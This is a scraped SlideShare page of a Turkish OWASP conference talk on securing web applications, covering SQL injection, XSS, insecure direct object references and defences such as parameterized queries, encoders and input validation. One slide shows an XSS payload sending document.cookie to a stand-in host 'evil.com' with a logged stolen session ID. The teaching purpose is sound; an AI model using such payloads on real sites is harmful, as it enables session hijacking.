SlideShare une entreprise Scribd logo

Bünyamin Demir - Secure YourApp

CypSec - Siber Güvenlik Konferansı
CypSec - Siber Güvenlik Konferansı
Technologie
1  sur  30
Télécharger pour lire hors ligne
SecureYourApp OWASP-Turkey Bünyamin Demir
Bünyamin Demir ( @bunyamindemir ) – Lisans Kocaeli Üni. Matematik Bölümü – Yüksek Lisans Kocaeli Üni Fen-Bilimleri, Tez; Oracle Veritabanı Güvenliği – Uygulama Geliştirici – OWASP Türkiye Bölüm Lideri – Sızma Testleri Uzmanı • Web, Mobil, Network, SCADA, Wireless, Sosyal Mühendislik, ATM, DoS/DDoS ve Yük testi • Kaynak kod analizi – Eğitmen • Web/Mobil Uygulama Güvenlik Denetimi • Güvenli Kod Geliştirme • Veritabanı Güvenliği 2
3 OWASP
4 Why is OWASP Special?
• OWASP Top 10 • OWASP Zed Attack Proxy (ZAP) • OpenSAMM • Cheat Sheets • ESAPI • ASVS • Testing Guide • Development Guide 5 OWASP Projects
6 OWASP ZAP Proxy / WebScarab
7 Application Security Verification Standart
Application Security 8 Two weeks of ethical hacking Ten man-years of development Business Logic Flaws Code Flaws Security Errors
Attacker vs. Defender 9
Web Application Threat Surface 10
11 OWASP TOP 10
A1 - Injection 12
Anatomy of SQL Injection Attack 13 sql = “SELECT * FROM user_table WHERE username = ‘” & Request(“username”) & “’ AND password = ‘” & Request (“password”) & ”’” What the developer intended: username = john password = password SQL Query: SELECT * FROM user_table WHERE username = ‘john’ AND password = ‘password’
Anatomy of SQL Injection Attack 14 sql = “SELECT * FROM user_table WHERE username = ‘” & Request(“username”) & “ ’ AND password = ‘ ” & Request(“password”) & “ ’ ” (This is DYNAMIC SQL and Untrusted Input) What the developer did not intend is parameter values like: username = john password = SQL Query: SELECT * FROM user_table WHERE username = ‘john’ AND password = causes all rows in the users table to be returned!
Bind Parameters (PHP) 15 $stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); $stmt->bindParam(':new_email', $email); $stmt->bindParam(':user_id', $id);
Parametrized Query (.NET) 16 SqlConnection objConnection = new SqlConnection(_ConnectionString); objConnection.Open(); SqlCommand objCommand = new SqlCommand( "SELECT * FROM User WHERE Name = @Name AND Password = @Password", objConnection); objCommand.Parameters.Add("@Name", NameTextBox.Text); objCommand.Parameters.Add("@Password", PassTextBox.Text); SqlDataReader objReader = objCommand.ExecuteReader();
Prepare Statement (Java) 17 String newName = request.getParameter("newName") ; String id = request.getParameter("id"); //SQL PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id); //HQL Query safeHQLQuery = session.createQuery("from Employees where id=:empId"); safeHQLQuery.setParameter("empId", id);
A3 - XSS 18
A3 - XSS 19
Anatomy of XSS Attack 20 http://www.davshan.loc/friends.php?search=<abc> <p>Result for <b><abc></b> :0<p><br /> http://www.davshan.loc/friends.php?search=<script>alert(1);</script>
Anatomy of XSS Attack 21 <script>document.write("<img src='http://www.evil.com?"+document.cookie+"'>")</script> 187.4.1.32 - - [28/Feb/2012:00:38:32 +0200] "GET /?PHPSESSID=ulc1141mm2tehjhfdqh1ktfas5 HTTP/1.1" 200 7425 "http://www.davshan.loc/....
OWASP Java Encoder Project 22 <%-- Basic HTML Context --%> <body><b><%= Encode.forHtml(UNTRUSTED) %>" /></b></body> <%-- HTML Attribute Context --%> <input type="text" name="data" value="<%= Encode.forHtmlAttribute(UNTRUSTED) %>" /> <%-- Javascript Block context --%> <script type="text/javascript"> var msg = "<%= Encode.forJavaScriptBlock(UNTRUSTED) %>"; alert(msg); </script> <%-- Javascript Variable context --%> <button onclick="alert('<%= Encode.forJavaScriptAttribute(UNTRUSTED) %>');">click me</button>
Rich Text 23
OWASP HTML Sanitizer Project 24 PolicyFactory policy = new HtmlPolicyBuilder() .allowElements("a") .allowUrlProtocols("https") .allowAttributes("href").onElements("a") .requireRelNofollowOnLinks() .build(); String safeHTML = policy.sanitize(untrustedHTML);
JQuery.Encoder 25 … $(function() { $(".div [name="+$.encoder.encodeForHTML($.encoder.canonicalize(window.location.hash.substr(1)+"]")); }); … encodeForHTMLAttribute, encodeForJavascript, encodeForURL, encodeForCSS $('#profile_link').html('<a href="/profile/' + $.encoder.encodeForURL(userID) + '">Link</a>');
A4 – Insecure Direct Object References 26 • Attacker notices his acct parameter is 6065 ?acct=6065 • He modifies it to a nearby number ?acct=6066 • Attacker views the victim’s account information https://www.onlinebank.com/user?acct=6065
Best way to SecureYourApp 27 Input Validation
Input Validation - Java 28 public boolean validateUsername(String username) { String usernamePattern = "^[a-zA-Z0-9]{6,12}$"; if (username == null) { return false; } Pattern p = Pattern.compile(usernamePattern); Matcher m = p.matcher(username); if (!m.matches()) { return false; } return true; } if (!validateUsername(username)) { //invalid username }
Input Validation - .NET 29 if (!Regex.IsMatch(TxtSinifAdi.Text, @"^[a-zA-Z0-9.s]{1,10}$")) { // sinif ismi uygun değildir }
30

Recommandé

Bünyamin Demir - 10 Adımda Yazılım Güvenliği
Bünyamin Demir - 10 Adımda Yazılım GüvenliğiBünyamin Demir - 10 Adımda Yazılım Güvenliği
Bünyamin Demir - 10 Adımda Yazılım GüvenliğiCypSec - Siber Güvenlik Konferansı
 
Web Uygulama Güvenliği (Akademik Bilişim 2016)
Web Uygulama Güvenliği (Akademik Bilişim 2016)Web Uygulama Güvenliği (Akademik Bilişim 2016)
Web Uygulama Güvenliği (Akademik Bilişim 2016)Ömer Çıtak
 
Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)Ömer Çıtak
 
URL to HTML
URL to HTMLURL to HTML
URL to HTMLFrancois Marier
 
Content Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army KnifeContent Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army KnifeScott Helme
 
Tecnologias Open Source para Alta Disponibilidade e Segurança de Aplicações Web
Tecnologias Open Source para Alta Disponibilidade e Segurança de Aplicações WebTecnologias Open Source para Alta Disponibilidade e Segurança de Aplicações Web
Tecnologias Open Source para Alta Disponibilidade e Segurança de Aplicações WebAlexandro Silva
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptFrancois Marier
 
Using PBWiki in Classrooms
Using PBWiki in ClassroomsUsing PBWiki in Classrooms
Using PBWiki in Classroomsniedermeierj
 

Recommandé

Bünyamin Demir - 10 Adımda Yazılım Güvenliği
Bünyamin Demir - 10 Adımda Yazılım GüvenliğiBünyamin Demir - 10 Adımda Yazılım Güvenliği
Bünyamin Demir - 10 Adımda Yazılım GüvenliğiCypSec - Siber Güvenlik Konferansı
 
Web Uygulama Güvenliği (Akademik Bilişim 2016)
Web Uygulama Güvenliği (Akademik Bilişim 2016)Web Uygulama Güvenliği (Akademik Bilişim 2016)
Web Uygulama Güvenliği (Akademik Bilişim 2016)Ömer Çıtak
 
Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)Memcache Injection (Hacktrick'15)
Memcache Injection (Hacktrick'15)Ömer Çıtak
 
URL to HTML
URL to HTMLURL to HTML
URL to HTMLFrancois Marier
 
Content Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army KnifeContent Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army KnifeScott Helme
 
Tecnologias Open Source para Alta Disponibilidade e Segurança de Aplicações Web
Tecnologias Open Source para Alta Disponibilidade e Segurança de Aplicações WebTecnologias Open Source para Alta Disponibilidade e Segurança de Aplicações Web
Tecnologias Open Source para Alta Disponibilidade e Segurança de Aplicações WebAlexandro Silva
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptFrancois Marier
 
Using PBWiki in Classrooms
Using PBWiki in ClassroomsUsing PBWiki in Classrooms
Using PBWiki in Classroomsniedermeierj
 
D3LDN17 - Recruiting the Browser
D3LDN17 - Recruiting the BrowserD3LDN17 - Recruiting the Browser
D3LDN17 - Recruiting the BrowserImperva Incapsula
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptFrancois Marier
 
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...Matt Raible
 
Defending web applications AISA Techday 2011 Perth
Defending web applications AISA Techday 2011 PerthDefending web applications AISA Techday 2011 Perth
Defending web applications AISA Techday 2011 PerthChristian Frichot
 
Configuring SSL on NGNINX and less tricky servers
Configuring SSL on NGNINX and less tricky serversConfiguring SSL on NGNINX and less tricky servers
Configuring SSL on NGNINX and less tricky serversAxilis
 
Practical django secuirty
Practical django secuirtyPractical django secuirty
Practical django secuirtyAndy Dai
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...OWASP Russia
 
Defeating Cross-Site Scripting with Content Security Policy
Defeating Cross-Site Scripting with Content Security PolicyDefeating Cross-Site Scripting with Content Security Policy
Defeating Cross-Site Scripting with Content Security PolicyFrancois Marier
 
10 Excellent Ways to Secure Your Spring Boot Application - Devoxx Belgium 2019
10 Excellent Ways to Secure Your Spring Boot Application - Devoxx Belgium 201910 Excellent Ways to Secure Your Spring Boot Application - Devoxx Belgium 2019
10 Excellent Ways to Secure Your Spring Boot Application - Devoxx Belgium 2019Matt Raible
 
Ws security with opensource platform
Ws security with opensource platformWs security with opensource platform
Ws security with opensource platformPegasystems
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Securitylevigross
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesSpin Lai
 
Content Security Policy
Content Security PolicyContent Security Policy
Content Security PolicyRyan LaBouve
 
Kan du få data tilbake igjen fra dine Elasticsearch snapshots?
Kan du få data tilbake igjen fra dine Elasticsearch snapshots?Kan du få data tilbake igjen fra dine Elasticsearch snapshots?
Kan du få data tilbake igjen fra dine Elasticsearch snapshots?Jan Fredrik Wedén
 
Nginx - The webserver you might actually like
Nginx - The webserver you might actually likeNginx - The webserver you might actually like
Nginx - The webserver you might actually likeEdorian
 
Lets exploit Injection and XSS
Lets exploit Injection and XSSLets exploit Injection and XSS
Lets exploit Injection and XSSlethalduck
 
Preventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyPreventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyKsenia Peguero
 
W3C Content Security Policy
W3C Content Security PolicyW3C Content Security Policy
W3C Content Security PolicyMarkus Wichmann
 
Nginx + PHP
Nginx + PHPNginx + PHP
Nginx + PHPWataru OKAMOTO
 
Secure Coding For Java - Une introduction
Secure Coding For Java - Une introductionSecure Coding For Java - Une introduction
Secure Coding For Java - Une introductionSebastien Gioria
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 

Contenu connexe

Tendances

D3LDN17 - Recruiting the Browser
D3LDN17 - Recruiting the BrowserD3LDN17 - Recruiting the Browser
D3LDN17 - Recruiting the BrowserImperva Incapsula
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptFrancois Marier
 
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...Matt Raible
 
Defending web applications AISA Techday 2011 Perth
Defending web applications AISA Techday 2011 PerthDefending web applications AISA Techday 2011 Perth
Defending web applications AISA Techday 2011 PerthChristian Frichot
 
Configuring SSL on NGNINX and less tricky servers
Configuring SSL on NGNINX and less tricky serversConfiguring SSL on NGNINX and less tricky servers
Configuring SSL on NGNINX and less tricky serversAxilis
 
Practical django secuirty
Practical django secuirtyPractical django secuirty
Practical django secuirtyAndy Dai
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...OWASP Russia
 
Defeating Cross-Site Scripting with Content Security Policy
Defeating Cross-Site Scripting with Content Security PolicyDefeating Cross-Site Scripting with Content Security Policy
Defeating Cross-Site Scripting with Content Security PolicyFrancois Marier
 
10 Excellent Ways to Secure Your Spring Boot Application - Devoxx Belgium 2019
10 Excellent Ways to Secure Your Spring Boot Application - Devoxx Belgium 201910 Excellent Ways to Secure Your Spring Boot Application - Devoxx Belgium 2019
10 Excellent Ways to Secure Your Spring Boot Application - Devoxx Belgium 2019Matt Raible
 
Ws security with opensource platform
Ws security with opensource platformWs security with opensource platform
Ws security with opensource platformPegasystems
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Securitylevigross
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesSpin Lai
 
Content Security Policy
Content Security PolicyContent Security Policy
Content Security PolicyRyan LaBouve
 
Kan du få data tilbake igjen fra dine Elasticsearch snapshots?
Kan du få data tilbake igjen fra dine Elasticsearch snapshots?Kan du få data tilbake igjen fra dine Elasticsearch snapshots?
Kan du få data tilbake igjen fra dine Elasticsearch snapshots?Jan Fredrik Wedén
 
Nginx - The webserver you might actually like
Nginx - The webserver you might actually likeNginx - The webserver you might actually like
Nginx - The webserver you might actually likeEdorian
 
Lets exploit Injection and XSS
Lets exploit Injection and XSSLets exploit Injection and XSS
Lets exploit Injection and XSSlethalduck
 
Preventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyPreventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyKsenia Peguero
 
W3C Content Security Policy
W3C Content Security PolicyW3C Content Security Policy
W3C Content Security PolicyMarkus Wichmann
 

Tendances (20)

D3LDN17 - Recruiting the Browser
D3LDN17 - Recruiting the BrowserD3LDN17 - Recruiting the Browser
D3LDN17 - Recruiting the Browser
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
 
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
 
Defending web applications AISA Techday 2011 Perth
Defending web applications AISA Techday 2011 PerthDefending web applications AISA Techday 2011 Perth
Defending web applications AISA Techday 2011 Perth
 
Configuring SSL on NGNINX and less tricky servers
Configuring SSL on NGNINX and less tricky serversConfiguring SSL on NGNINX and less tricky servers
Configuring SSL on NGNINX and less tricky servers
 
Practical django secuirty
Practical django secuirtyPractical django secuirty
Practical django secuirty
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
 
Defeating Cross-Site Scripting with Content Security Policy
Defeating Cross-Site Scripting with Content Security PolicyDefeating Cross-Site Scripting with Content Security Policy
Defeating Cross-Site Scripting with Content Security Policy
 
10 Excellent Ways to Secure Your Spring Boot Application - Devoxx Belgium 2019
10 Excellent Ways to Secure Your Spring Boot Application - Devoxx Belgium 201910 Excellent Ways to Secure Your Spring Boot Application - Devoxx Belgium 2019
10 Excellent Ways to Secure Your Spring Boot Application - Devoxx Belgium 2019
 
Ws security with opensource platform
Ws security with opensource platformWs security with opensource platform
Ws security with opensource platform
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Security
 
Two scoops of Django - Security Best Practices
Two scoops of Django - Security Best PracticesTwo scoops of Django - Security Best Practices
Two scoops of Django - Security Best Practices
 
Content Security Policy
Content Security PolicyContent Security Policy
Content Security Policy
 
Kan du få data tilbake igjen fra dine Elasticsearch snapshots?
Kan du få data tilbake igjen fra dine Elasticsearch snapshots?Kan du få data tilbake igjen fra dine Elasticsearch snapshots?
Kan du få data tilbake igjen fra dine Elasticsearch snapshots?
 
Nginx - The webserver you might actually like
Nginx - The webserver you might actually likeNginx - The webserver you might actually like
Nginx - The webserver you might actually like
 
Lets exploit Injection and XSS
Lets exploit Injection and XSSLets exploit Injection and XSS
Lets exploit Injection and XSS
 
Preventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyPreventing XSS with Content Security Policy
Preventing XSS with Content Security Policy
 
W3C Content Security Policy
W3C Content Security PolicyW3C Content Security Policy
W3C Content Security Policy
 
Nginx + PHP
Nginx + PHPNginx + PHP
Nginx + PHP
 

Similaire à Bünyamin Demir - Secure YourApp

Secure Coding For Java - Une introduction
Secure Coding For Java - Une introductionSecure Coding For Java - Une introduction
Secure Coding For Java - Une introductionSebastien Gioria
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automationOWASP
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
Webinar: Developing with the modern App Stack: MEAN and MERN (with Angular2 a...
Webinar: Developing with the modern App Stack: MEAN and MERN (with Angular2 a...Webinar: Developing with the modern App Stack: MEAN and MERN (with Angular2 a...
Webinar: Developing with the modern App Stack: MEAN and MERN (with Angular2 a...MongoDB
 
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptx
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptxTrack 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptx
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptxAmazon Web Services
 
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全Amazon Web Services
 
New Features of JSR 317 (JPA 2.0)
New Features of JSR 317 (JPA 2.0)New Features of JSR 317 (JPA 2.0)
New Features of JSR 317 (JPA 2.0)Markus Eisele
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Securityjemond
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxFernandoVizer
 
Database design i_-_1_dl300
Database design i_-_1_dl300Database design i_-_1_dl300
Database design i_-_1_dl300KOI Lastone
 
OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2ssuser18349f1
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxjohnpragasam1
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxazida3
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxcgt38842
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxnmk42194
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
 
Microservice Come in Systems
Microservice Come in SystemsMicroservice Come in Systems
Microservice Come in SystemsMarkus Eisele
 
SOA with C, C++, PHP and more
SOA with C, C++, PHP and moreSOA with C, C++, PHP and more
SOA with C, C++, PHP and moreWSO2
 

Similaire à Bünyamin Demir - Secure YourApp (20)

Secure Coding For Java - Une introduction
Secure Coding For Java - Une introductionSecure Coding For Java - Une introduction
Secure Coding For Java - Une introduction
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
Sql Injection V.2
Sql Injection V.2Sql Injection V.2
Sql Injection V.2
 
[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
 
Webinar: Developing with the modern App Stack: MEAN and MERN (with Angular2 a...
Webinar: Developing with the modern App Stack: MEAN and MERN (with Angular2 a...Webinar: Developing with the modern App Stack: MEAN and MERN (with Angular2 a...
Webinar: Developing with the modern App Stack: MEAN and MERN (with Angular2 a...
 
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptx
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptxTrack 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptx
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptx
 
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全
 
New Features of JSR 317 (JPA 2.0)
New Features of JSR 317 (JPA 2.0)New Features of JSR 317 (JPA 2.0)
New Features of JSR 317 (JPA 2.0)
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
Database design i_-_1_dl300
Database design i_-_1_dl300Database design i_-_1_dl300
Database design i_-_1_dl300
 
OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2OWASP_Top_Ten_Proactive_Controls version 2
OWASP_Top_Ten_Proactive_Controls version 2
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
OWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptxOWASP_Top_Ten_Proactive_Controls_v32.pptx
OWASP_Top_Ten_Proactive_Controls_v32.pptx
 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
 
Microservice Come in Systems
Microservice Come in SystemsMicroservice Come in Systems
Microservice Come in Systems
 
SOA with C, C++, PHP and more
SOA with C, C++, PHP and moreSOA with C, C++, PHP and more
SOA with C, C++, PHP and more
 

Plus de CypSec - Siber Güvenlik Konferansı

Minhaç Çelik - Ülkelerin Siber Güvenlik Stratejileri ve Siber Güvenlik Strate...
Minhaç Çelik - Ülkelerin Siber Güvenlik Stratejileri ve Siber Güvenlik Strate...Minhaç Çelik - Ülkelerin Siber Güvenlik Stratejileri ve Siber Güvenlik Strate...
Minhaç Çelik - Ülkelerin Siber Güvenlik Stratejileri ve Siber Güvenlik Strate...CypSec - Siber Güvenlik Konferansı
 
Adil Burak Sadıç - Siber Güvenlik mi, Bilgi Güvenliği mi, BT Güvenliği mi?
Adil Burak Sadıç - Siber Güvenlik mi, Bilgi Güvenliği mi, BT Güvenliği mi? Adil Burak Sadıç - Siber Güvenlik mi, Bilgi Güvenliği mi, BT Güvenliği mi?
Adil Burak Sadıç - Siber Güvenlik mi, Bilgi Güvenliği mi, BT Güvenliği mi? CypSec - Siber Güvenlik Konferansı
 
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle SaldırılarıOnur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle SaldırılarıCypSec - Siber Güvenlik Konferansı
 
İsmail Burak Tuğrul - Online Bankacılık Uygulamalarında Karlılaşılan Güvenlik...
İsmail Burak Tuğrul - Online Bankacılık Uygulamalarında Karlılaşılan Güvenlik...İsmail Burak Tuğrul - Online Bankacılık Uygulamalarında Karlılaşılan Güvenlik...
İsmail Burak Tuğrul - Online Bankacılık Uygulamalarında Karlılaşılan Güvenlik...CypSec - Siber Güvenlik Konferansı
 
Huzeyfe Önal - SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı...
Huzeyfe Önal - SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı...Huzeyfe Önal - SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı...
Huzeyfe Önal - SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı...CypSec - Siber Güvenlik Konferansı
 
Evren Yalçın - Fatmagül Ergani - Kurumsal firmalar için hata avcılığı
Evren Yalçın - Fatmagül Ergani - Kurumsal firmalar için hata avcılığıEvren Yalçın - Fatmagül Ergani - Kurumsal firmalar için hata avcılığı
Evren Yalçın - Fatmagül Ergani - Kurumsal firmalar için hata avcılığıCypSec - Siber Güvenlik Konferansı
 
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...CypSec - Siber Güvenlik Konferansı
 

Plus de CypSec - Siber Güvenlik Konferansı (13)

Minhaç Çelik - Ülkelerin Siber Güvenlik Stratejileri ve Siber Güvenlik Strate...
Minhaç Çelik - Ülkelerin Siber Güvenlik Stratejileri ve Siber Güvenlik Strate...Minhaç Çelik - Ülkelerin Siber Güvenlik Stratejileri ve Siber Güvenlik Strate...
Minhaç Çelik - Ülkelerin Siber Güvenlik Stratejileri ve Siber Güvenlik Strate...
 
Adil Burak Sadıç - Siber Güvenlik mi, Bilgi Güvenliği mi, BT Güvenliği mi?
Adil Burak Sadıç - Siber Güvenlik mi, Bilgi Güvenliği mi, BT Güvenliği mi? Adil Burak Sadıç - Siber Güvenlik mi, Bilgi Güvenliği mi, BT Güvenliği mi?
Adil Burak Sadıç - Siber Güvenlik mi, Bilgi Güvenliği mi, BT Güvenliği mi?
 
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle SaldırılarıOnur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
 
İsmail Burak Tuğrul - Online Bankacılık Uygulamalarında Karlılaşılan Güvenlik...
İsmail Burak Tuğrul - Online Bankacılık Uygulamalarında Karlılaşılan Güvenlik...İsmail Burak Tuğrul - Online Bankacılık Uygulamalarında Karlılaşılan Güvenlik...
İsmail Burak Tuğrul - Online Bankacılık Uygulamalarında Karlılaşılan Güvenlik...
 
Yrd. Doç. Dr. Yavuz Erdoğan
Yrd. Doç. Dr. Yavuz ErdoğanYrd. Doç. Dr. Yavuz Erdoğan
